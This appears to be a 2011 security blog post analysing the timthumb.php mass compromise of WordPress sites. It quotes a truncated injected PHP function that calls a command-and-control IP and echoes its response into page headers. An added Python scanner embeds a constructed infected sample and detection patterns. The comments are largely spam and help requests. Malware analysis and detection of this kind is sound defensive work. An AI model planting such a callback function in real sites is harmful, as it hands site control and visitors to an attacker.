Timthumb.php Mass Infection – Aftermath – Part I

October 28, 2011, by David Dede

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to have metrics on the number of sites that were truly affected, but the problem is that it’s very hard to estimate how many sites were in fact compromised. One thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months, most of the compromised sites had their wp-settings.php modified with a function that contacts the URL http://91.196.216.30/bt.php for instructions on what to do with the site (display malware, spam, etc.). Yes, kinda like a command and control site.

This is done through this function:

function counter_wordpress()
{
    $_F = __FILE__;
    $_X = 'Pz48P3BocCAkM3JsID..fWD0wOw=='));
    $ua = urlencode(strtol..
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 2);
    $re = curl_exec($ch);
    curl_close($ch);
    echo $re;
}
add_action("wp_head", 'counter_wordpress');

If you are familiar with PHP/WordPress, you’ll notice that this adds the output of the function (counter_wordpress, which calls 91.196.216.30/bt.php) to the header of the compromised site.

Everything works as intended for the attacker, but what happens when the site at 91.196.216.30 goes down? If the site has display_errors enabled in PHP, this will show up:

 Warning: file_get_contents(http://91.196.216.30/bt.php?ip=IP&host=..

Basically, if that IP address goes down, you can identify the compromised sites by looking for this error. Fortunately, that IP address went down several times during the last few weeks, and if we search Google for that error ("Warning: file_get_contents(http://91.196.216.30/bt.php"), this is what we get:

Yes, about 1 million pages had this error when Google crawled them. If you restrict the Google search to just the last 30 days, it shows around 200k pages.

Now, if you consider that not all sites have display_errors enabled, and that many of them were not crawled by Google while the malware domain was down, the number of compromised sites is still very large. We would guess it is in the couple of millions.

That’s a whole slew of sites affected by one third-party script in which a vulnerability was found and subsequently exploited. What do you guys think? We’d love more ideas if you have any.
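As an added defender-side example (not code from this post or from Sucuri), the Python below flags wp_head callbacks in a PHP file whose body fetches remote content, and separately checks rendered HTML for the leaked warning string the post searches Google for. The sample infected fragment is constructed from the snippet quoted above, with the base64 blob shortened and the URL assembly assumed; the quoted snippet uses curl while the warning comes from a file_get_contents() variant, so the scanner matches both.

```python
import re
# Constructed sample modelled on the counter_wordpress() snippet quoted in the post:
# base64 blob shortened and URL assembly assumed; this is not the real payload.
SAMPLE_INFECTED = r'''<?php
require( ABSPATH . WPINC . '/load.php' );
function counter_wordpress()
{$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID==';
$url="http://91.196.216.30/bt.php?ip=".$_SERVER['REMOTE_ADDR'];
$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$re = curl_exec($ch);curl_close($ch);echo $re;}add_action("wp_head", 'counter_wordpress');
'''
# Constructed clean fragment: stock wp-settings.php registers no wp_head callbacks (assumption).
SAMPLE_CLEAN = "<?php\nrequire( ABSPATH . WPINC . '/load.php' );\ndo_action( 'init' );\n"
HOOK_RE = re.compile(r"""add_action\s*\(\s*['"]wp_head['"]\s*,\s*['"](\w+)['"]""")
REMOTE_FETCH_RE = re.compile(r"\b(curl_init|file_get_contents|fopen|fsockopen)\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"]+")
B64_RE = re.compile(r"""['"][A-Za-z0-9+/]{16,}={0,2}['"]""")
# Error string the post searches Google for; it leaks only when display_errors is on.
C2_WARNING_RE = re.compile(r"Warning:\s+file_get_contents\(http://91\.196\.216\.30/bt\.php")

def function_body(src, name):
    # Return the body of the named PHP function by brace matching ('' if absent).
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def find_suspicious_wp_head_hooks(src):
    """List (callback, reasons) for wp_head hooks whose body fetches remote content."""
    findings = []
    for name in HOOK_RE.findall(src):
        body, reasons = function_body(src, name), []
        if REMOTE_FETCH_RE.search(body):
            reasons.append("remote fetch")
        if URL_RE.search(body):
            reasons.append("hardcoded URL " + URL_RE.search(body).group())
        if B64_RE.search(body):
            reasons.append("base64-looking blob")
        if reasons:
            findings.append((name, reasons))
    return findings

def page_shows_c2_warning(html):
    # True if the rendered page leaks the file_get_contents() warning for the C2 URL.
    return bool(C2_WARNING_RE.search(html))
```

This is a triage heuristic only; confirm a hit by diffing wp-settings.php against a pristine copy of the same WordPress release.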

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress Security
Tags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. DeepIndex

    November 15, 2011

    One of my websites has been hacked with this timthumb vulnerability, it’s a pity to clean all the files… I’m on it since last Friday :-/

  2. Burton Taylor

    November 17, 2011

    It is a great article with valuable information. Thanks for sharing the article.

  3. Andrei

    November 18, 2011

    Thanx for instruction

  4. JAdeer

    December 2, 2011

    My blog also shows this. What should I do to remove that???

    jdrnandi@gmail.com Mail me

    • 2013 dekorasyon

      March 7, 2012

       To remove it download a new one I think. 2012 dekorasyon,ev dekorasyon,dekorasyon

  5. limerick2

    December 10, 2011

    Good Mantel point out there! 

    • 7i57i75

      March 2, 2012

       tbhehber

  6. Fábio

    December 14, 2011

    Huge number of infections… But how to fix this definitely?

    • 7i57i75

      March 2, 2012

       fffffffffffffffff

    • dekorasyon

      March 7, 2012

       What is the problem

  7. Kelly

    December 19, 2011

    I think this is my problem. Can your service help me?

  8. Panghaidar

    February 16, 2012

    My WordPress blog got hacked too ../sigh

  9. ev dekorasyon

    March 7, 2012

     I have it in the cache and delete the cache file is also available

  10. teras dekorasyonu

    March 9, 2012

    2012 dekorasyon
    ev dekorasyon
    dekorasyon

    pratik bilgiler
    2012 pratik bilgiler
    pratik
    2013 pratik bilgiler

  11. Uwodzenie

    May 1, 2012

    My site was owned by this script 🙁

  12. Dekorasyon

    May 5, 2012

    Yes, about 1 million pages had this error when Google crawled it. If you reduce the Google search for just the last 30 days, it will show around 200k pages.
    http://www.akinyapi.net

  13. mobilya dekorasyon

    June 12, 2012

    i cant remove it please help

    http://www.mobilyala.com

  14. Matthew Lampard

    August 20, 2012

    I think it’s already a thing of the past, pretty much network support.
